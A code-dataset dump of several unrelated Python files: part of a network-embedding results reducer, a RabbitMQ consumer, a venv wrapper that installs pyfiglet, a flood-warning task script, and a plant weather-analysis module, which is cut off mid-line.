np.zeros(len(result_list))\n max_edge_load_vals = np.zeros(len(result_list))\n total_runtime_vals = np.zeros(len(result_list))\n profit_vals = np.zeros(len(result_list))\n\n num_edge_mapping_failed = 0\n num_initial_lp_failed = 0\n num_node_mapping_failed = 0\n\n runtimes_per_request_vals = []\n for (result_index, result) in result_list:\n assert isinstance(result, vine.OfflineViNEResult)\n solution_object = result.get_solution()\n mappings = solution_object.request_mapping\n\n load = _initialize_load_dict(scenario)\n for req in scenario.requests:\n runtimes_per_request_vals.append(\n result.runtime_per_request[req]\n )\n req_mapping = mappings[req]\n if req_mapping is not None and req_mapping.is_embedded:\n profit_vals[result_index] += req.profit\n _compute_mapping_load(load, req, req_mapping)\n\n edge_mapping_failed, lp_failed, is_embedded, node_mapping_failed = self._count_mapping_status(result)\n num_edge_mapping_failed += edge_mapping_failed\n num_initial_lp_failed += lp_failed\n num_node_mapping_failed += node_mapping_failed\n\n max_edge_load, max_node_load = get_max_node_and_edge_load(load, scenario.substrate)\n max_node_load_vals[result_index] = max_node_load\n max_edge_load_vals[result_index] = max_edge_load\n total_runtime_vals[result_index] = result.total_runtime\n\n reduced = ReducedOfflineViNEResultCollection(\n max_node_load=get_aggregated_data(max_node_load_vals),\n max_edge_load=get_aggregated_data(max_edge_load_vals),\n total_runtime=get_aggregated_data(total_runtime_vals),\n profit=get_aggregated_data(profit_vals),\n runtime_per_request=get_aggregated_data(runtimes_per_request_vals),\n num_initial_lp_failed=num_initial_lp_failed,\n num_node_mapping_failed=num_node_mapping_failed,\n num_edge_mapping_failed=num_edge_mapping_failed,\n num_req_with_profit=number_of_req_profit,\n original_number_requests=number_of_requests\n )\n ssd_reduced[algorithm][scenario_id][exec_id][vine_settings].append(reduced)\n del scenario_solution_storage.scenario_parameter_container.scenario_list\n del scenario_solution_storage.scenario_parameter_container.scenario_triple\n scenario_solution_storage.algorithm_scenario_solution_dictionary = ssd_reduced\n\n logger.info(\"Writing result pickle to {}\".format(reduced_baseline_solutions_output_pickle_path))\n with open(reduced_baseline_solutions_output_pickle_path, \"wb\") as f:\n pickle.dump(scenario_solution_storage, f)\n logger.info(\"All done.\")\n return scenario_solution_storage\n\n def _count_mapping_status(self, vine_result):\n assert isinstance(vine_result, vine.OfflineViNEResult)\n num_is_embedded = 0\n num_initial_lp_failed = 0\n num_node_mapping_failed = 0\n num_edge_mapping_failed = 0\n for status in vine_result.mapping_status_per_request.values():\n if status == vine.ViNEMappingStatus.is_embedded:\n num_is_embedded += 1\n elif status == vine.ViNEMappingStatus.initial_lp_failed:\n num_initial_lp_failed += 1\n elif status == vine.ViNEMappingStatus.node_mapping_failed:\n num_node_mapping_failed += 1\n elif status == vine.ViNEMappingStatus.edge_mapping_failed:\n num_edge_mapping_failed += 1\n else:\n raise ValueError(\"Unexpected mapping status!\")\n return num_edge_mapping_failed, num_initial_lp_failed, num_is_embedded, num_node_mapping_failed\n\n\nclass RandRoundSepLPOptDynVMPCollectionResultReducer(object):\n\n def __init__(self):\n pass\n\n def reduce_randround_result_collection(self,\n randround_solutions_input_pickle_name,\n reduced_randround_solutions_output_pickle_name=None):\n\n randround_solutions_input_pickle_path = os.path.join(util.ExperimentPathHandler.INPUT_DIR,\n randround_solutions_input_pickle_name)\n\n if reduced_randround_solutions_output_pickle_name is None:\n file_basename = os.path.basename(randround_solutions_input_pickle_path).split(\".\")[0]\n reduced_randround_solutions_output_pickle_path = os.path.join(util.ExperimentPathHandler.OUTPUT_DIR,\n file_basename + \"_reduced.pickle\")\n else:\n reduced_randround_solutions_output_pickle_path = os.path.join(util.ExperimentPathHandler.OUTPUT_DIR,\n randround_solutions_input_pickle_name)\n\n logger.info(\"\\nWill read from ..\\n\\t{} \\n\\t\\tand store reduced data into\\n\\t{}\\n\".format(\n randround_solutions_input_pickle_path, reduced_randround_solutions_output_pickle_path))\n\n logger.info(\"Reading pickle file at {}\".format(randround_solutions_input_pickle_path))\n with open(randround_solutions_input_pickle_path, \"rb\") as f:\n sss = pickle.load(f)\n\n sss.scenario_parameter_container.scenario_list = None\n sss.scenario_parameter_container.scenario_triple = None\n\n for alg, scenario_solution_dict in sss.algorithm_scenario_solution_dictionary.iteritems():\n logger.info(\".. Reducing results of algorithm {}\".format(alg))\n for sc_id, ex_param_solution_dict in scenario_solution_dict.iteritems():\n logger.info(\" .. handling scenario {}\".format(sc_id))\n for ex_id, solution in ex_param_solution_dict.iteritems():\n compressed = self.reduce_single_solution(solution)\n ex_param_solution_dict[ex_id] = compressed\n\n logger.info(\"Writing result pickle to {}\".format(reduced_randround_solutions_output_pickle_path))\n with open(reduced_randround_solutions_output_pickle_path, \"w\") as f:\n pickle.dump(sss, f)\n logger.info(\"All done.\")\n return sss\n\n def reduce_single_solution(self, solution):\n if solution is None:\n return None\n assert isinstance(solution, treewidth_model.RandRoundSepLPOptDynVMPCollectionResult)\n\n max_node_loads = {}\n max_edge_loads = {}\n rounding_runtimes = {}\n profits = {}\n\n for algorithm_sub_parameters, rounding_result_list in solution.solutions.items():\n max_node_loads[algorithm_sub_parameters] = []\n max_edge_loads[algorithm_sub_parameters] = []\n rounding_runtimes[algorithm_sub_parameters] = []\n profits[algorithm_sub_parameters] = []\n\n for rounding_result in rounding_result_list:\n max_node_loads[algorithm_sub_parameters].append(rounding_result.max_node_load)\n max_edge_loads[algorithm_sub_parameters].append(rounding_result.max_edge_load)\n rounding_runtimes[algorithm_sub_parameters].append(rounding_result.time_to_round_solution)\n profits[algorithm_sub_parameters].append(rounding_result.profit)\n\n for algorithm_sub_parameters in solution.solutions.keys():\n max_node_loads[algorithm_sub_parameters] = get_aggregated_data(max_node_loads[algorithm_sub_parameters])\n max_edge_loads[algorithm_sub_parameters] = get_aggregated_data(max_edge_loads[algorithm_sub_parameters])\n rounding_runtimes[algorithm_sub_parameters] = get_aggregated_data(rounding_runtimes[algorithm_sub_parameters])\n profits[algorithm_sub_parameters] = get_aggregated_data(profits[algorithm_sub_parameters])\n\n assert isinstance(solution.lp_computation_information, treewidth_model.SeparationLPSolution)\n # TODO Check which information is actually of interest\n # TODO Some of the data can be reduced further (store only mean and std. dev.)\n\n solution = ReducedRandRoundSepLPOptDynVMPCollectionResult(\n lp_time_preprocess=solution.lp_computation_information.time_preprocessing,\n lp_time_tree_decomposition=get_aggregated_data(solution.lp_computation_information.tree_decomp_runtimes),\n lp_time_dynvmp_initialization=get_aggregated_data(solution.lp_computation_information.dynvmp_init_runtimes),\n lp_time_dynvmp_computation=[get_aggregated_data(values) for values in solution.lp_computation_information.dynvmp_computation_runtimes],\n lp_time_gurobi_optimization=get_aggregated_data(solution.lp_computation_information.gurobi_runtimes),\n lp_time_optimization=solution.lp_computation_information.time_optimization,\n lp_status=solution.lp_computation_information.status,\n lp_profit=solution.lp_computation_information.profit,\n lp_generated_columns=solution.lp_computation_information.number_of_generated_mappings,\n max_node_loads=max_node_loads,\n max_edge_loads=max_edge_loads,\n rounding_runtimes=rounding_runtimes,\n profits=profits,\n )\n return solution\n\n\ndef _initialize_load_dict(scenario):\n load = dict([((u, v), 0.0) for (u, v) in scenario.substrate.edges])\n for u in scenario.substrate.nodes:\n for t in scenario.substrate.node[u]['supported_types']:\n load[(t, u)] = 0.0\n return load\n\n\ndef _compute_mapping_load(load, req, req_mapping):\n for i, u in req_mapping.mapping_nodes.iteritems():\n node_demand = req.get_node_demand(i)\n load[(req.get_type(i), u)] += node_demand\n\n if isinstance(req_mapping, solutions.Mapping):\n _compute_mapping_edge_load_unsplittable(load, req, req_mapping)\n elif isinstance(req_mapping, vine.SplittableMapping):\n _compute_mapping_edge_load_splittable(load, req, req_mapping)\n return load\n\n\ndef _compute_mapping_edge_load_unsplittable(load, req, req_mapping):\n for ij, sedge_list in req_mapping.mapping_edges.iteritems():\n edge_demand = req.get_edge_demand(ij)\n for uv in sedge_list:\n load[uv] += edge_demand\n\n\ndef _compute_mapping_edge_load_splittable(load, req, req_mapping):\n for ij, edge_vars_dict in req_mapping.mapping_edges.iteritems():\n edge_demand = req.get_edge_demand(ij)\n for uv, x in edge_vars_dict.items():\n load[uv] += edge_demand * x\n\n\ndef get_max_node_and_edge_load(load_dict, substrate):\n max_node_load = 0\n max_edge_load = 0\n for resource, value in load_dict.iteritems():\n x, y = resource\n if resource in substrate.edges:\n max_edge_load = max(max_edge_load, value)\n elif x in substrate.get_types() and y in substrate.nodes:\n max_node_load = max(max_node_load, value)\n else:\n raise ValueError(\"Invalid resource {}\".format(resource))\n return max_edge_load, max_node_load\n","repo_name":"vnep-approx/evaluation-acm-ccr-2019","sub_path":"evaluation_acm_ccr_2019/plot_data.py","file_name":"plot_data.py","file_ext":"py","file_size_in_byte":16651,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"44"} +{"seq_id":"38206676376","text":"import pika,os,sys\nimport time\n\ndef main():\n credentials = pika.PlainCredentials(\"guest\", \"guest\")\n connection = pika.BlockingConnection(pika.ConnectionParameters('localhost', 5672, '/', credentials))\n channel = connection.channel()\n channel.queue_declare(queue=\"hello1\",durable=True)#he durability options let the tasks survive even if RabbitMQ is restarted.\n\n # def callback(ch,method,properties,body):\n # print(\" [x] Received %r\" % body)\n def callback(ch, method, properties, body):\n print(\" [x] Received %r\" % body.decode())\n time.sleep(body.count(b'.'))\n print(\" [x] Done\")\n ch.basic_ack(delivery_tag=method.delivery_tag)#Manual ack auto_ack needs to be False\n\n channel.basic_qos(prefetch_count=1)#not to give more than one message to a worker at a time. Or, in other words, don't dispatch a new message to a worker until it has processed and acknowledged the previous one.\n channel.basic_consume(queue=\"hello1\",on_message_callback=callback, auto_ack=False)\n print(' [*] Waiting for messages. To exit press CTRL+C')\n channel.start_consuming()\n\nif __name__ == \"__main__\":\n try:\n main()\n except KeyboardInterrupt:\n print('Interrupted')\n try:\n sys.exit(0)\n except SystemExit:\n os._exit(0)\n\n","repo_name":"RajpootPratima/RabbitMQ-with-Python","sub_path":"receive.py","file_name":"receive.py","file_ext":"py","file_size_in_byte":1313,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"19983599556","text":"import venv, sys, shutil, os\nfrom subprocess import run\nfrom contextlib import redirect_stderr, redirect_stdout\n\n\ndef create_venv(directory: str):\n venv.create(directory, with_pip=True)\n\n\ndef install_figlet(venv_directory: str):\n with open('/tmp/help.txt', 'w') as std_out:\n run([f'{venv_directory}/bin/pip', 'install', 'pyfiglet'], stdout=std_out)\n os.remove('/tmp/help.txt')\n\n\ndef run_figdate(venv_directory: str, args: list):\n run([f'{venv_directory}/bin/python3', '-m', 'figdate'] + args)\n\n\nif __name__ == '__main__':\n venv_dir = '/tmp/venv_02_pushpip'\n create_venv(venv_dir)\n install_figlet(venv_dir)\n run_figdate(venv_dir, sys.argv[1:])\n shutil.rmtree(venv_dir)","repo_name":"BondarevIvan/python-development22","sub_path":"02_PushPip/figdate_wrapper.py","file_name":"figdate_wrapper.py","file_ext":"py","file_size_in_byte":701,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"72547433094","text":"# This is the file for writing the testing programs of Task2B\n\n\nfrom floodsystem.stationdata import build_station_list, update_water_levels\nfrom floodsystem.flood import stations_level_over_threshold\n\n\ndef run():\n # Build list of stations\n stations = build_station_list()\n # Update the current water levels in the station objects\n update_water_levels(stations)\n\n threshold = 0.8\n # Get the list of stations over the relative water level threshold\n over_threshold = stations_level_over_threshold(stations, threshold)\n\n # Iterate through each station in the output list and print in the correct format\n for entry in over_threshold:\n print(f\"{entry[0].name} {entry[1]}\")\n\n\nif __name__ == \"__main__\":\n print(\"*** Task 2B: CUED Part IA Flood Warning System ***\")\n run()\n","repo_name":"TimHire/Ia-flood-risk","sub_path":"Task2B.py","file_name":"Task2B.py","file_ext":"py","file_size_in_byte":805,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"29805195747","text":"import xml.etree.ElementTree as ET\nimport showLogData\n\ntemp_high = 0\ntemp_low = 0\nwind_high = 0\nwind_low = 0\nwind_nat = \"\"\nwind_acid_co2_min = 0\nwind_acid_co2_high = 0\nwind_acid_HCLO3_min = 0\nwind_acid_HCLO3_high = 0\nwind_base_min = 0\nwind_base_max = 0\nwind_toxic_co_min = 0\nwind_toxic_co_high = 0\nAH_high = 0\nAH_low = 0\nRH_high = 0\nRH_low = 0\nSOIL_M_MIN = 0\nSOIL_M_MAX = 0\nPH_top = 0\nPH_bottom = 0\nintencity_top = 0\nintencity_bottom = 0\nUV_top = 0\nUV_bottom = 0\nIR_top = 0\nIR_bottom = 0\n\nclass whetherAnalysis:\n\tprint(\"whetherAnalysis\")\n\t# temprature = []\n\ttemprature = 0\n\twind = 0\n\twind_direction = 0\n\thumidity = 0\n\tsoileMoisture = 0\n\twind_content = \"\"\n\n\tdef __init__(_temp, _wind_s, _wind_dir, _wind_co2, _wind_clo3, _wind_base, _wind_co, A_hue, R_hue, _soil, _ph, _intensity, _uv, _ir):\n\t\tprint(\"__init__\")\n\t\ttemprature = _temp\n\t\t\n\t\tA_humidity = A_hue\n\t\tR_humidity = R_hue\n\n\t\tsoileMoisture = _soil\n\n\t\twind = _wind_s\n\t\twind_nat = _wind_dir\n\t\twind_co2 = _wind_co2\n\t\twind_clo3 = _wind_clo3\n\t\twind_base = _wind_base\n\t\twind_co = _wind_co\n\n\t\tph_level = _ph\n\n\t\tintensity_level = _intensity\n\t\tUV_level = _uv\n\t\tIR_level = _ir\n\t\tprint(intensity_level)\n\t\tprint(UV_level)\n\t\tprint(IR_level)\n\n\t\tprint(temprature)\n\t\tprint(wind)\n\t\tprint(A_humidity)\n\t\tprint(R_humidity)\n\n\t\tprint(soileMoisture)\n\n\t\tpath = \"E:\\\\ZZZZZ\\\\FIT\\\\suwa project\\\\demoFlower.xml\"\n\t\ttree = ET.parse(path)\n\t\troot = tree.getroot()\n\n\t\tfor child in root:\n\t\t\tprint(child.tag)\n\n\t\tfull_xml_data = ET.tostring(root, encoding='utf8').decode('utf8')\n\t\tprint(full_xml_data)\n\n\t\twhetherAnalysis.getFlowerXML_Data()\n\t\twhetherAnalysis.tempratureAnalysis(temprature)\n\t\twhetherAnalysis.windAnalysis(wind, wind_nat, wind_co2, wind_clo3, wind_base, wind_co)\n\t\twhetherAnalysis.humidityAnalysis(A_humidity, R_humidity)\n\t\twhetherAnalysis.soileMoistureAnalysis(soileMoisture)\n\t\twhetherAnalysis.phAnalysis(ph_level)\n\t\twhetherAnalysis.intensityAnalysis(intensity_level, UV_level, IR_level)\n\n\n\n\tdef tempratureAnalysis(temprature):\n\t\tprint(\"tempratureAnalysis\", temprature)\n\t\t# get ranges from xml\n\t\t# 1 read xml val\n\t\tglobal temp_high\n\t\tglobal temp_low\n\n\t\ttry:\n\t\t\tif(temp_high == temprature or temp_high > temprature):\n\t\t\t\tbTempHigh = True\n\t\t\t\n\t\t\tif(temp_low == temprature or temp_low < temprature):\n\t\t\t\tbTempLow = True\n\n\t\t\tif(bTempHigh == True & bTempLow == True):\n\t\t\t\t# Print on the log\n\t\t\t\tshowLogData.printLogData(\"THE TEMPRATURE \"+str(temprature)+\"'C IS SUITABLE FOR PLANT\")\n\t\t\telif(bTempHigh == False | bTempLow == False):\n\t\t\t\tshowLogData.printLogData(\"THE TEMPRATURE \"+str(temprature)+\"'C IS HARMFUL FOR PLANT(OUT OF RANGE)\")\n\t\t\telse:\n\t\t\t\tshowLogData.printLogData(\"TEMPRATURE NOT HAS BEEN DEFINED\")\n\t\texcept:\n\t\t\tshowLogData.printLogData(\"TEMPRATURE CAPTURE FALURE\")\n\n\n\n\tdef windAnalysis(wind_speed, wind_nature, co2_level, hclo3_level, sope_water_level, co_level):\n\t\tglobal wind_high\n\t\tglobal wind_low\n\n\t\tglobal wind_nat\n\n\t\tglobal wind_acid_co2_min\n\t\tglobal wind_acid_co2_high\n\n\t\tglobal wind_acid_HCLO3_min\n\t\tglobal wind_acid_HCLO3_high\n\n\t\tglobal wind_base_min\n\t\tglobal wind_base_max\n\n\t\tglobal wind_toxic_co_min\n\t\tglobal wind_toxic_co_high\n\n\t\t# wind_speed\n\t\tbWindHigh = False\n\t\tbWindLow = False\n\t\tif(wind_high == wind_speed or wind_high > wind_speed):\n\t\t\tbWindHigh = True\n\t\t\t\n\t\tif(wind_low == wind_speed or wind_low < wind_speed):\n\t\t\tbWindLow = True\n\n\t\tif(bWindHigh == True & bWindLow == True):\n\t\t\t# Print on the log\n\t\t\tshowLogData.printLogData(str(wind_speed)+\" km h^-1 OF WIND SPEED IS SUITABLE FOR PLANT\")\n\t\telif(bWindHigh == False or bWindLow == False):\n\t\t\tshowLogData.printLogData(str(wind_speed)+\" km h^-1 OF WIND SPEED IS HARMFUL FOR PLANT(OUT OF RANGE)\")\n\t\telse:\n\t\t\tshowLogData.printLogData(\"WIND SPEED NOT HAS BEEN DEFINED\")\n\n\t\t# wind_nature\n\t\tif(wind_nature == wind_nat):\n\t\t\t# Print on the log\n\t\t\tshowLogData.printLogData(\"WIND NATURE : \"+wind_nature+\", STATUS : OK\")\n\t\telse:\n\t\t\tshowLogData.printLogData(\"WIND NATURE : \"+wind_nature+\", STATUS : NOT OK\")\n\n\t\t# co2_level\n\t\tbco2_levelHigh = False\n\t\tbco2_levelLow = False\n\t\tif(wind_acid_co2_high == co2_level or wind_acid_co2_high > co2_level):\n\t\t\tbco2_levelHigh = True\n\t\t\t\n\t\tif(wind_acid_co2_min == co2_level or wind_acid_co2_min < co2_level):\n\t\t\tbco2_levelLow = True\n\n\t\tif(bco2_levelHigh == True & bco2_levelLow == True):\n\t\t\t# Print on the log\n\t\t\tshowLogData.printLogData(str(co2_level)+\"g m^-3 OF CO2 IS SUITABLE FOR PLANT\")\n\t\telif(bco2_levelHigh == False or bco2_levelLow == False):\n\t\t\tshowLogData.printLogData(str(co2_level)+\"g m^-3 OF CO2 IS HARMFUL FOR PLANT(OUT OF RANGE)\")\n\t\telse:\n\t\t\tshowLogData.printLogData(\"CO2 LEVEL NOT HAS BEEN DEFINED\")\n\n\t\t# hclo3_level\n\t\tbHCLO3_levelHigh = False\n\t\tbHCLO3_levelLow = False\n\t\tif(wind_acid_HCLO3_high == hclo3_level or wind_acid_HCLO3_high > hclo3_level):\n\t\t\tbHCLO3_levelHigh = True\n\t\t\t\n\t\tif(wind_acid_HCLO3_min == hclo3_level or wind_acid_HCLO3_min < hclo3_level):\n\t\t\tbHCLO3_levelLow = True\n\n\t\tif(bHCLO3_levelHigh == True & bHCLO3_levelLow == True):\n\t\t\t# Print on the log\n\t\t\tshowLogData.printLogData(str(hclo3_level)+\"g m^-3 OF HCLO3 IS SUITABLE FOR PLANT\")\n\t\telif(bHCLO3_levelHigh == False or bHCLO3_levelLow == False):\n\t\t\tshowLogData.printLogData(str(hclo3_level)+\"g m^-3 OF HCLO3 IS HARMFUL FOR PLANT(OUT OF RANGE)\")\n\t\telse:\n\t\t\tshowLogData.printLogData(\"HCLO3 VAPOUR AMOUNT NOT HAS BEEN DEFINED\")\n\n\t\t# sope_water_level\n\t\tbSOPE_levelHigh = False\n\t\tbSOPE_levelLow = False\n\t\tif(wind_base_max == sope_water_level or wind_base_max > sope_water_level):\n\t\t\tbSOPE_levelHigh = True\n\t\t\t\n\t\tif(wind_base_min == sope_water_level or wind_base_min < sope_water_level):\n\t\t\tbSOPE_levelLow = True\n\n\t\tif(bSOPE_levelHigh == True & bSOPE_levelLow == True):\n\t\t\t# Print on the log\n\t\t\tshowLogData.printLogData(str(sope_water_level)+\"g m^-3 OF SOAP VAPOUR IS SUITABLE FOR PLANT\")\n\t\telif(bSOPE_levelHigh == False or bSOPE_levelLow == False):\n\t\t\tshowLogData.printLogData(str(sope_water_level)+\"g m^-3 OF SOAP VAPOUR IS HARMFUL FOR PLANT(OUT OF RANGE)\")\n\t\telse:\n\t\t\tshowLogData.printLogData(\"SOAP VAPOUR AMOUNT NOT HAS BEEN DEFINED\")\n\n\t\t# co_level\n\t\tbCO_levelHigh = False\n\t\tbCO_levelLow = False\n\t\tif(wind_toxic_co_high == co_level or wind_toxic_co_high > co_level):\n\t\t\tbCO_levelHigh = True\n\t\t\t\n\t\tif(wind_toxic_co_min == co_level or wind_toxic_co_min < co_level):\n\t\t\tbCO_levelLow = True\n\n\t\tif(bCO_levelHigh == True & bCO_levelLow == True):\n\t\t\t# Print on the log\n\t\t\tshowLogData.printLogData(str(co_level)+\"g m^-3 OF CO IS SUITABLE FOR PLANT\")\n\t\telif(bCO_levelHigh == False or bCO_levelLow == False):\n\t\t\tshowLogData.printLogData(str(co_level)+\"g m^-3 OF CO IS HARMFUL FOR PLANT(OUT OF RANGE)\")\n\t\telse:\n\t\t\tshowLogData.printLogData(\"CO AMOUNT NOT HAS BEEN DEFINED\")\n\n\n\tdef humidityAnalysis(A_humidity, R_humidity):\n\n\t\tglobal AH_high\n\t\tglobal AH_low\n\t\tglobal RH_high\n\t\tglobal RH_low\n\n\t\t# A_humidity\n\t\tbAHumidity_levelHigh = False\n\t\tbAHumidity_levelLow = False\n\t\tif(AH_high == A_humidity or AH_high > A_humidity):\n\t\t\tbAHumidity_levelHigh = True\n\t\t\t\n\t\tif(AH_low == A_humidity or AH_low < A_humidity):\n\t\t\tbAHumidity_levelLow = True\n\n\t\tif(bAHumidity_levelHigh == True & bAHumidity_levelLow == True):\n\t\t\t# Print on the log\n\t\t\tshowLogData.printLogData(str(A_humidity)+\"g m^-3 OF WATER VAPOUR IS SUITABLE FOR PLANT\")\n\t\telif(bAHumidity_levelHigh == False or bAHumidity_levelLow == False):\n\t\t\tshowLogData.printLogData(str(A_humidity)+\"g m^-3 OF WATER VAPOUR IS HARMFUL FOR PLANT(OUT OF RANGE)\")\n\t\telse:\n\t\t\tshowLogData.printLogData(\"WATER VAPOUR AMOUNT NOT HAS BEEN DEFINED\")\n\n\t\t# R_humidity\n\t\tbRHumidity_levelHigh = False\n\t\tbRHumidity_levelLow = False\n\t\tif(RH_high == R_humidity or RH_high > R_humidity):\n\t\t\tbRHumidity_levelHigh = True\n\t\t\t\n\t\tif(RH_low == R_humidity or RH_low < R_humidity):\n\t\t\tbRHumidity_levelLow = True\n\t\t\n\t\tif(bRHumidity_levelHigh == True & bRHumidity_levelLow == True):\n\t\t\t# Print on the log\n\t\t\tshowLogData.printLogData(str(R_humidity)+\"g m^-3 OF WATER VAPOUR IS SUITABLE FOR PLANT\")\n\t\telif(bRHumidity_levelHigh == False or bRHumidity_levelLow == False):\n\t\t\tshowLogData.printLogData(str(R_humidity)+\"g m^-3 OF WATER VAPOUR IS HARMFUL FOR PLANT(OUT OF RANGE)\")\n\t\telse:\n\t\t\tshowLogData.printLogData(\"WATER VAPOUR PERCENTAGE NOT HAS BEEN DEFINED\")\n\n\n\tdef soileMoistureAnalysis(soileMoisture):\n\t\tglobal SOIL_M_MIN\n\t\tglobal SOIL_M_MAX\n\n\t\t# soileMoisture\n\t\tbSoil_levelHigh = False\n\t\tbSoil_levelLow = False\n\t\tif(SOIL_M_MAX == soileMoisture or SOIL_M_MAX > soileMoisture):\n\t\t\tbSoil_levelHigh = True\n\t\t\t\n\t\tif(SOIL_M_MIN == soileMoisture or SOIL_M_MIN < soileMoisture):\n\t\t\tbSoil_levelLow = True\n\n\t\tif(bSoil_levelHigh == True & bSoil_levelLow == True):\n\t\t\t# Print on the log\n\t\t\tshowLogData.printLogData(str(soileMoisture)+\"g kg^-1 OF SOILE MOISTURE IS SUITABLE FOR PLANT\")\n\t\telif(bSoil_levelHigh == False or bSoil_levelLow == False):\n\t\t\tshowLogData.printLogData(str(soileMoisture)+\"g kg^-1 OF SOILE MOISTURE IS HARMFUL FOR PLANT(OUT OF RANGE)\")\n\t\telse:\n\t\t\tshowLogData.printLogData(\"SOILE MOISTURE AMOUNT NOT HAS BEEN DEFINED\")\n\n\tdef phAnalysis(ph_level):\n\t\tglobal PH_top\n\t\tglobal PH_bottom\n\n\t\t# ph_level\n\t\tbPH_levelHigh = False\n\t\tbPH_levelLow = False\n\t\tif(PH_top == ph_level or PH_top > ph_level):\n\t\t\tbPH_levelHigh = True\n\t\t\t\n\t\tif(PH_bottom == ph_level or PH_bottom < ph_level):\n\t\t\tbPH_levelLow = True\n\n\t\tif(bPH_levelHigh == True & bPH_levelLow == True):\n\t\t\t# Print on the log\n\t\t\tshowLogData.printLogData(str(ph_level)+\" OF ph LEVEL IS SUITABLE FOR PLANT\")\n\t\telif(bPH_levelHigh == False or bPH_levelLow == False):\n\t\t\tshowLogData.printLogData(str(ph_level)+\" OF ph LEVEL IS HARMFUL FOR PLANT(OUT OF RANGE)\")\n\t\telse:\n\t\t\tshowLogData.printLogData(\"ph LEVEL NOT HAS BEEN DEFINED\")\n\n\tdef intensityAnalysis(intensity_C, UV_C, IR_C):\n\t\tglobal intencity_top\n\t\tglobal intencity_bottom\n\t\tglobal UV_top\n\t\tglobal UV_bottom\n\t\tglobal IR_top\n\t\tglobal IR_bottom\n\n\t\t# intensity_C\n\t\tbIntensity_levelHigh = False\n\t\tbIntensity_levelLow = False\n\t\tif(intencity_top == intensity_C or intencity_top > intensity_C):\n\t\t\tbIntensity_levelHigh = True\n\t\t\t\n\t\tif(intencity_bottom == intensity_C or intencity_bottom < intensity_C):\n\t\t\tbIntensity_levelLow = True\n\n\t\tif(bIntensity_levelHigh == True & bIntensity_levelLow == True):\n\t\t\t# Print on the log\n\t\t\tshowLogData.printLogData(str(intensity_C)+\" W m^-2 OF INTENCITY LEVEL IS SUITABLE FOR PLANT\")\n\t\telif(bIntensity_levelHigh == False or bIntensity_levelLow == False):\n\t\t\tshowLogData.printLogData(str(intensity_C)+\" W m^-2 OF INTENCITY LEVEL IS HARMFUL FOR PLANT(OUT OF RANGE)\")\n\t\telse:\n\t\t\tshowLogData.printLogData(\"INTENCITY LEVEL NOT HAS BEEN DEFINED\")\n\n\t\t# UV_C\n\t\tbUV_levelHigh = False\n\t\tbUV_levelLow = False\n\t\tif(UV_top == UV_C or UV_top > UV_C):\n\t\t\tbUV_levelHigh = True\n\t\t\t\n\t\tif(UV_bottom == UV_C or UV_bottom < UV_C):\n\t\t\tbUV_levelLow = True\n\n\t\tif(bUV_levelHigh == True & bUV_levelLow == True):\n\t\t\t# Print on the log\n\t\t\tshowLogData.printLogData(str(UV_C)+\" W m^-2 OF UV LEVEL IS SUITABLE FOR PLANT\")\n\t\telif(bUV_levelHigh == False or bUV_levelLow == False):\n\t\t\tshowLogData.printLogData(str(UV_C)+\" W m^-2 OF UV LEVEL IS HARMFUL FOR PLANT(OUT OF RANGE)\")\n\t\telse:\n\t\t\tshowLogData.printLogData(\"UV LEVEL NOT HAS BEEN DEFINED\")\n\n\t\t# IR_C\n\t\tbIR_levelHigh = False\n\t\tbIR_levelLow = False\n\t\tif(IR_top == IR_C or IR_top > IR_C):\n\t\t\tbIR_levelHigh = True\n\t\t\t\n\t\tif(IR_bottom == IR_C or IR_bottom < IR_C):\n\t\t\tbIR_levelLow = True\n\n\t\tif(bIR_levelHigh == True & bIR_levelLow == True):\n\t\t\t# Print on the log\n\t\t\tshowLogData.printLogData(str(IR_C)+\" W m^-2 OF IR LEVEL IS SUITABLE FOR PLANT\")\n\t\telif(bIR_levelHigh == False or bIR_levelLow == False):\n\t\t\tshowLogData.printLogData(str(IR_C)+\" W m^-2 OF IR LEVEL IS HARMFUL FOR PLANT(OUT OF RANGE)\")\n\t\telse:\n\t\t\tshowLogData.printLogData(\"IR LEVEL NOT HAS BEEN DEFINED\")\n\n\tdef getFlowerXML_Data():\n\t\tglobal temp_high\n\t\tglobal temp_low\n\t\tglobal wind_high\n\t\tglobal wind_low\n\t\tglobal wind_nat\n\t\tglobal wind_acid_co2_min\n\t\tglobal wind_acid_co2_high\n\t\tglobal wind_acid_HCLO3_min\n\t\tglobal wind_acid_HCLO3_high\n\t\tglobal wind_base_min\n\t\tglobal wind_base_max\n\t\tglobal wind_toxic_co_min\n\t\tglobal wind_toxic_co_high\n\t\tglobal AH_high\n\t\tglobal AH_low\n\t\tglobal RH_high\n\t\tglobal RH_low\n\t\tglobal SOIL_M_MIN\n\t\tglobal SOIL_M_MAX\n\t\tglobal PH_top\n\t\tglobal PH_bottom\n\t\tglobal intencity_top\n\t\tglobal intencity_bottom\n\t\tglobal UV_top\n\t\tglobal UV_bottom\n\t\tglobal IR_top\n\t\tglobal IR_bottom\n\n\t\t# get path\n\t\tpath = \"E:\\\\ZZZZZ\\\\FIT\\\\suwa project\\\\demoFlower.xml\"\n\t\ttree = ET.parse(path)\n\t\troot = tree.getroot()\n\n\t\tfor temp in root.iter('TEMPRATURE'):\n\t\t\ttemp_high = float(temp.find('HIGH').text)\n\t\t\ttemp_low = float(temp.find('LOW').text)\n\n\t\tfor temp in root.iter('WIND'):\n\t\t\twind_high = float(temp.find('WIND_SPEED_MAX').text)\n\t\t\twind_low = float(temp.find('WIND_SPEED_MIN').text)\n\t\t\twind_nat = temp.find('WIND_NATURE').text\n\t\t\t# wind_cont = temp.find('WIND_CONTENT').text\n\t\t\tfor wind_c in root.iter('WIND_CONTENT'):\n\t\t\t\tfor wind_a in root.iter('ACID'):\n\t\t\t\t\t# wind_acid = wind_c.find('ACID').text\n\t\t\t\t\tfor wind_a1 in root.iter('CO2'):\n\t\t\t\t\t\twind_acid_co2_min = float(wind_a1.find('CO2_MIN').text)\n\t\t\t\t\t\twind_acid_co2_high = float(wind_a1.find('CO2_MAX').text)\n\t\t\t\t\tfor wind_a2 in root.iter('HCLO3'):\n\t\t\t\t\t\twind_acid_HCLO3_min = float(wind_a2.find('HCLO3_MIN').text)\n\t\t\t\t\t\twind_acid_HCLO3_high = 